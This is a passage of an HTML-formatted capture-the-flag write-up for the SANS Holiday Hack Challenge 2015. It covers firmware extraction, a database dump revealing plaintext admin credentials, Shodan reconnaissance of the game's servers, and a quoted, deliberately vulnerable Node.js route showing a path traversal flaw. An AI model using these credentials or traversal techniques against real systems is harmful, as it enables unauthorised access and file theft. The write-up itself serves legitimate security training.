&lt;span class="gp"&gt;$&lt;/span&gt; dd &lt;span class="nv"&gt;bs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="nv"&gt;skip&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="m"&gt;4495&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;giyh-capture_decoded.txt &lt;span class="p"&gt;|&lt;/span&gt; sed &lt;span class="s1"&gt;&amp;#39;s/FILE://g&amp;#39;&lt;/span&gt; &amp;gt; giyh-capture_image.jpg &lt;span class="c1"&gt;# we skip the beginning of the decoded file, and remove the &amp;quot;FILE:&amp;quot; string from the result&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We get the following image:&lt;/p&gt;
&lt;img alt="giyh-capture_image.jpg" class="align-center" src="/images/sans-christmas-challenge-2015/giyh-capture_image.jpg" /&gt;
&lt;p&gt;The flag for this part is &lt;code&gt;GnomeNET-NorthAmerica&lt;/code&gt;&lt;/p&gt;
&lt;img alt="first_flag_confirmation" class="align-center" src="/images/sans-christmas-challenge-2015/first_flag_confirmation.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="part-2-ill-be-gnome-for-christmas-firmware-analysis-for-fun-and-profit"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id7"&gt;Part 2: I’ll be Gnome for Christmas: &lt;em&gt;Firmware Analysis for Fun and Profit&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After seeing such a strange and creepy behaviour (come on, man, you're taking
pictures of little kids' bedrooms), we are asked to analyze the firmware of
the gnome.&lt;/p&gt;
&lt;p&gt;We recover the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/giyh-firmware-dump.bin"&gt;firmware&lt;/a&gt; (sha256:
&lt;code&gt;bee93a79bb8ee2eba526494b4e6e56a601e1fa9589a1cccf7bfe61261ab8db20&lt;/code&gt;) from
Jessica. Now, time to analyze it! The best tool I know for file analysis is binwalk:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; binwalk giyh-firmware-dump.bin

&lt;span class="go"&gt;DECIMAL       HEXADECIMAL     DESCRIPTION&lt;/span&gt;
&lt;span class="go"&gt;--------------------------------------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;0             0x0             PEM certificate&lt;/span&gt;
&lt;span class="go"&gt;1809          0x711           ELF 32-bit LSB shared object, ARM, version 1 (SYSV)&lt;/span&gt;
&lt;span class="go"&gt;168803        0x29363         Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 17376149 bytes,  4866 inodes, blocksize: 131072 bytes, created: Tue Dec  8 19:47:32 2015&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Using the &lt;code&gt;-e&lt;/code&gt; option form binwalk, we can extract the different files,
and unsquash the file system, to get a browsable version of the file system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; binwalk -e giyh-firmware-dump.bin

&lt;span class="go"&gt;DECIMAL       HEXADECIMAL     DESCRIPTION&lt;/span&gt;
&lt;span class="go"&gt;--------------------------------------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;0             0x0             PEM certificate&lt;/span&gt;
&lt;span class="go"&gt;1809          0x711           ELF 32-bit LSB shared object, ARM, version 1 (SYSV)&lt;/span&gt;
&lt;span class="go"&gt;168803        0x29363         Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 17376149 bytes,  4866 inodes, blocksize: 131072 bytes, created: Tue Dec  8 19:47:32 2015&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; _giyh-firmware-dump.bin.extracted/squashfs-root
&lt;span class="gp"&gt;$&lt;/span&gt; ls
&lt;span class="go"&gt;bin  etc  init  lib  mnt  opt  overlay  rom  root  sbin  tmp  usr  var  www&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat etc/banner
&lt;span class="go"&gt;  _______                     ________        __&lt;/span&gt;
&lt;span class="go"&gt; |       |.-----.-----.-----.|  |  |  |.----.|  |_&lt;/span&gt;
&lt;span class="go"&gt; |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|&lt;/span&gt;
&lt;span class="go"&gt; |_______||   __|_____|__|__||________||__|  |____|&lt;/span&gt;
&lt;span class="go"&gt;          |__| W I R E L E S S   F R E E D O M&lt;/span&gt;
&lt;span class="go"&gt; -----------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt; DESIGNATED DRIVER (Bleeding Edge, r47650)&lt;/span&gt;
&lt;span class="go"&gt; -----------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;  * 2 oz. Orange Juice         Combine all juices in a&lt;/span&gt;
&lt;span class="go"&gt;  * 2 oz. Pineapple Juice      tall glass filled with&lt;/span&gt;
&lt;span class="go"&gt;  * 2 oz. Grapefruit Juice     ice, stir well.&lt;/span&gt;
&lt;span class="go"&gt;  * 2 oz. Cranberry Juice&lt;/span&gt;
&lt;span class="go"&gt; -----------------------------------------------------&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the firmware is based on OpenWRT, more specifically the
Designated Driver branch, which is the development branch. We can find
the architecture by looking at some binary files in the &lt;code&gt;bin&lt;/code&gt; folder:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; file bin/ash
&lt;span class="go"&gt;bin/ash: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-armhf.so.1, stripped&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The architecture of the gnome seems to be 32-bit ARM.&lt;/p&gt;
&lt;p&gt;We can see a &lt;code&gt;www&lt;/code&gt; folder at the root of the file system. Let's take a
look at it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ls
&lt;span class="go"&gt;app.js  bin  files  node_modules  package.json  public  routes  views&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ls views
&lt;span class="go"&gt;cameras.jade  error.jade  files.jade  gnomenet.jade  index.jade  layout.jade  login.jade  network.jade  settings.jade&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The embedded web site seems to be a NodeJS website, using the Jade Node
Template Engine.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; head app.js
&lt;span class="go"&gt;var express = require(&amp;#39;express&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var path = require(&amp;#39;path&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var favicon = require(&amp;#39;serve-favicon&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var logger = require(&amp;#39;morgan&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var cookieParser = require(&amp;#39;cookie-parser&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var bodyParser = require(&amp;#39;body-parser&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var routes = require(&amp;#39;./routes/index&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var mongo = require(&amp;#39;mongodb&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var monk = require(&amp;#39;monk&amp;#39;);&lt;/span&gt;
&lt;span class="go"&gt;var db = monk(&amp;#39;gnome:KTt9C1SljNKDiobKKro926frc@localhost:27017/gnome&amp;#39;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the web site uses MongoDB as the database management system. We
can find the MongoDB files in the squashfs-root/opt/mongodb directory. Let's
copy them to a local install of MongoDB so that we can analyze them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; sudo cp squashfs-root/opt/mongodb/gnome.* /var/lib/mongodb
&lt;span class="gp"&gt;$&lt;/span&gt; sudo chown mongodb:nogroup /var/lib/mongodb/gnome.*
&lt;span class="gp"&gt;$&lt;/span&gt; sudo service mongodb start
&lt;span class="gp"&gt;$&lt;/span&gt; mongo gnome
&lt;span class="go"&gt;MongoDB shell version: 2.4.10&lt;/span&gt;
&lt;span class="go"&gt;connecting to: gnome&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; show collections
&lt;span class="go"&gt;cameras&lt;/span&gt;
&lt;span class="go"&gt;settings&lt;/span&gt;
&lt;span class="go"&gt;status&lt;/span&gt;
&lt;span class="go"&gt;system.indexes&lt;/span&gt;
&lt;span class="go"&gt;users&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; db.users.find&lt;span class="o"&gt;()&lt;/span&gt;
&lt;span class="go"&gt;{ &amp;quot;_id&amp;quot; : ObjectId(&amp;quot;56229f58809473d11033515b&amp;quot;), &amp;quot;username&amp;quot; : &amp;quot;user&amp;quot;, &amp;quot;password&amp;quot; : &amp;quot;user&amp;quot;, &amp;quot;user_level&amp;quot; : 10 }&lt;/span&gt;
&lt;span class="go"&gt;{ &amp;quot;_id&amp;quot; : ObjectId(&amp;quot;56229f63809473d11033515c&amp;quot;), &amp;quot;username&amp;quot; : &amp;quot;admin&amp;quot;, &amp;quot;password&amp;quot; : &amp;quot;SittingOnAShelf&amp;quot;, &amp;quot;user_level&amp;quot; : 100 }&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the credentials are stored in plaintext, which is a big no-no.
The credentials to connect to the gnome web interface as an administrator are
&lt;code&gt;admin/SittingOnAShelf&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The flag for this part is &lt;code&gt;SittingOnAShelf&lt;/code&gt;.&lt;/p&gt;
&lt;img alt="second_flag_confirmation" class="align-center" src="/images/sans-christmas-challenge-2015/second_flag_confirmation.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="part-3-let-it-gnome-let-it-gnome-let-it-gnome-internet-wide-scavenger-hunt"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id8"&gt;Part 3: Let it Gnome! Let it Gnome! Let it Gnome! &lt;em&gt;Internet-Wide Scavenger Hunt&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The gnomes are apparently commanded by five SuperGnomes, which are the C&amp;amp;C
servers. How can we identify them? Jessica tells us that we can &lt;em&gt;sho Dan&lt;/em&gt; the
password information we found. It took me a while (shame on me) to understand
that it was a clue given to us to use the famous Shodan website to identify
the SuperGnomes present on the Internet.&lt;/p&gt;
&lt;img alt="jessica_shodan" class="align-center" src="/images/sans-christmas-challenge-2015/jessica_shodan.png" /&gt;
&lt;p&gt;If we look back at the traffic capture from the first part of this write-up,
we can see that the gnome is communicating with a server named
cmd.sg1.atnascorp.com.&lt;/p&gt;
&lt;p&gt;Let's take the string &amp;quot;atnascorp&amp;quot; and search it in Shodan. You can find the
result at &lt;a class="reference external" href="https://www.shodan.io/search?query=atnascorp"&gt;this URL&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="shodan_result" class="align-center" src="/images/sans-christmas-challenge-2015/shodan_result.png" /&gt;
&lt;p&gt;From the traffic analysis and the results from Shodan, we have found the five
SuperGnomes:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;SuperGnome01: 52.2.229.189, located in United States, Ashburn (VI)&lt;/li&gt;
&lt;li&gt;SuperGnome02: 52.34.3.80, located in United States, Portland (OR)&lt;/li&gt;
&lt;li&gt;SuperGnome03: 52.64.191.71, located in Australia, Sydney&lt;/li&gt;
&lt;li&gt;SuperGnome04: 52.192.152.132, located in Japan, Tokyo&lt;/li&gt;
&lt;li&gt;SuperGnome05: 54.233.105.81, located in Brazil, Sao Paulo&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These targets were confirmed by the Great and Powerful Oracle, Tom Hessman.&lt;/p&gt;
&lt;img alt="third_flag_confirmation" class="align-center" src="/images/sans-christmas-challenge-2015/third_flag_confirmation.png" /&gt;
&lt;p&gt;No flag for this part.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="part-4-theres-no-place-like-gnome-for-the-holidays-gnomage-pwnage"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id9"&gt;Part 4: There’s No Place Like Gnome for the Holidays: &lt;em&gt;Gnomage Pwnage&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Now, it's time to compromise these SuperGnomes! To prove that we have control
of the SuperGnomes, we must recover the content of
&lt;code&gt;/gnome/www/files/gnome.conf&lt;/code&gt;.&lt;/p&gt;
&lt;div class="section" id="id1"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://52.2.229.189/"&gt;SuperGnome01&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This SuperGnome is the easiest of them all. Indeed, you just have to connect
to the web interface with the credentials found during the firmware analysis.
You can then go to the files tab, and download the configuration file:&lt;/p&gt;
&lt;img alt="sg01_w00t" class="align-center" src="/images/sans-christmas-challenge-2015/sg01_w00t.png" /&gt;
&lt;p&gt;The flag for this SuperGnome is &lt;code&gt;NCC1701&lt;/code&gt;
(&lt;a class="reference external" href="https://en.wikipedia.org/wiki/USS_Enterprise_%28NCC-1701%29"&gt;geeky reference&lt;/a&gt;).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id2"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://52.34.3.80/"&gt;SuperGnome02&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;When we connect to SuperGnome02, we can go the files tab, but we can't download
any file.&lt;/p&gt;
&lt;img alt="sg02_download_fail.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg02_download_fail.png" /&gt;
&lt;p&gt;However, there is a path traversal vulnerability in the web backend
of the SuperGnome:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File www/route/index.js, line 182&lt;/span&gt;
&lt;span class="c1"&gt;// CAMERA VIEWER&lt;/span&gt;
&lt;span class="c1"&gt;// STUART: Note: to limit disclosure issues, this code checks to make sure the user asked for a .png file&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/cam&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;unescape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;query&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;camera&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;  &lt;span class="c1"&gt;// check for .png&lt;/span&gt;
  &lt;span class="c1"&gt;//if (camera.indexOf(&amp;#39;.png&amp;#39;) == -1) // STUART: Removing this...I think this is a better solution... right?&lt;/span&gt;
  &lt;span class="nx"&gt;camera&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;.png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="c1"&gt;// add .png if its not found&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Cam:&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="hll"&gt;  &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;access&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./public/images/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;F_OK&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;R_OK&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;File ./public/images/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; does not exist or access denied!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;./public/images/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;camera&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the &lt;code&gt;camera&lt;/code&gt; parameter goes through no sanitization. The
only thing done to this parameter is that it is appended with the
&lt;code&gt;'.png'&lt;/code&gt; string. However, on some version of the gnome, this string is
appended only if it is not previously found in the parameter. This means that
if we find a directory with &lt;code&gt;.png&lt;/code&gt; in its name, we can access any file.&lt;/p&gt;
&lt;p&gt;Fortunately, we can create a directory with an arbitray name:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File www/route/index.js, line 127&lt;/span&gt;
&lt;span class="c1"&gt;// SETTINGS UPLOAD&lt;/span&gt;
&lt;span class="nx"&gt;router&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;post&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/settings&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;logged_in&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;user_level&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;99&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="c1"&gt;// AUGGIE: settings upload allowed for admins (admins are 100, currently)&lt;/span&gt;
&lt;span class="hll"&gt;    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;filen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;filen&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;dirname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/gnome/www/public/upload/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;newdir&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;filen&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[];&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;free&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nx"&gt;disk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;check&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;info&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;free&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;info&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;      &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mknewdir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;substr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lastIndexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)));&lt;/span&gt;
&lt;/span&gt;      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Dir &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;substr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;dirname&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lastIndexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;/ created successfully!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;code&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;EEXIST&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;throw&lt;/span&gt; &lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;free&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;99999999999&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="c1"&gt;// AUGGIE: I think this is breaking uploads?  Stuart why did you set this so high?&lt;/span&gt;
      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Insufficient space!  File creation error!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
